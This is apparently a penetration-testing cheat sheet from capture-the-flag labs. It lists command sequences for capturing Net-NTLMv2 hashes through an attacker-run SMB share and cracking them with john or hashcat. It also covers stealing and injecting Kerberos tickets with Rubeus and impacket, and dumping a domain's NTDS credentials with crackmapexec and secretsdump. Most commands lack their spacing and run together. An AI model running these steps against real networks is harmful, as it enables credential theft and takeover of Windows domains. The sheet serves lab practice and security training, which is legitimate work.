For SMB protocol, here is a quick way to grab Net-NTLM-v2 hash and crack it
# Kali Kali> smbserver.py-smb2supportsmb.# Windows CMD> typenull>hello.txtCMD> copyhello.txt \\10.10.14.107\smb# Kalivihashes.txt# and copy and past it johnhashes.txt--wordlist=/usr/share/wordlists/rockyou.txt# orhashcathashes.txt/usr/share/wordlists/rockyou.txt
Kerberos Tickets
For current user without password, use Rebeus.
# Run the command to get TGT for curren user# Rubeus shows base64 format of Kerberos ticket. CMD> .\Rubeus.exetgtdeleg/nowrap# @Kali# Copy ticket to a filevikirbi.b64# decode base64 file -> binary format used for mimikatzbase64-dkirbi.b64>ticket.kirbi# Convert the kirbi to ccache for impacket and metasploit impacket-ticketConverterticket.kirbiG0.ccache# Inject the ticket into memoryexport KRB5CCNAME=G0.ccache # This is the case of Machine certificate# Modify clock SKEW issue sudontpdate10.129.228.120# Validate if you can use the ticket cmesmbg0.flight.htb-k--use-kcache# g0.flight.htb is the target machine # Grab all NTDS content with the ticket cmesmbg0.flight.htb-k--use-kcache--ntdsdrsuapi# DirSync with ticket impacket-secretsdump-no-pass-kg0.flight.htb-just-dc-userAdministrator
For user with password or NTLM hash, you could use Impact tools.
#impact-getTGTimpacket-getTGT'absolute.htb/d.klay:Darkmoonsky248girl'-dc-ip $RHOSTimpacket-getTGTignite.local/yashika-hashes:64fbae31cc352fc26af97cbdef151e03-dc-ip $RHOST# Inject the ticket into memoryexport KRB5CCNAME=d.klay.ccache# The rest of the attack is the same as above.